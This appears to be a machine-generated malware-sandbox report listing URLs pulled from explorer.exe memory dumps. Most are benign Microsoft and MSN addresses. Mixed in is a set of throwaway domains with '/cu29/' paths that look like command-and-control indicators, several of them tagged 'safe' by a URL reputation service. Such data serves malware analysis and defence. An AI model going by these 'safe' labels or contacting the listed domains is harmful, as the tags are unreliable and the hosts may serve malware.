                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.4005157734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.yzq0n.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.leachlondonstore.online/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://excel.office.comexplorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.68716329.xyzReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nd-los.net/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apita.topReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.oldsteps.buzzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.5mwhs.top/cu29/www.layman.vipexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.apita.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.inn-paaaa.buzz/cu29/www.irex.infoexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.microsoft.cexplorer.exe, 00000006.00000002.4005528609.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076441838.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.leachlondonstore.onlineReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameJHnNxt6Pnb.exe, 00000000.00000002.1539683468.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://android.notify.windows.com/iOSdexplorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.inn-paaaa.buzz/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.irex.infoexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.layman.vipReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.srtio.xyz/cu29/www.leachlondonstore.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.48372305.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.layman.vip/cu29/www.nd-los.netexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.siabgc4d.online/cu29/www.48372305.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.apita.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.nd-los.netReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.layman.vip/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://outlook.comexplorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.inn-paaaa.buzzReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.azino-forum-pro.online/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.azino-forum-pro.onlineReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.layman.vipexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4008024188.000000000BCA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288001841.000000000BCA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077089186.000000000BCA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657529257.000000000BCA9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.68716329.xyz/cu29/www.apita.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.f6b-crxy.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.oldsteps.buzzReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.azino-forum-pro.online/cu29/www.68716329.xyzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.yzq0n.top/cu29/www.siabgc4d.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.srtio.xyzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.leachlondonstore.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.nd-los.net/cu29/meexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.f6b-crxy.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.irex.info/cu29/www.yzq0n.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
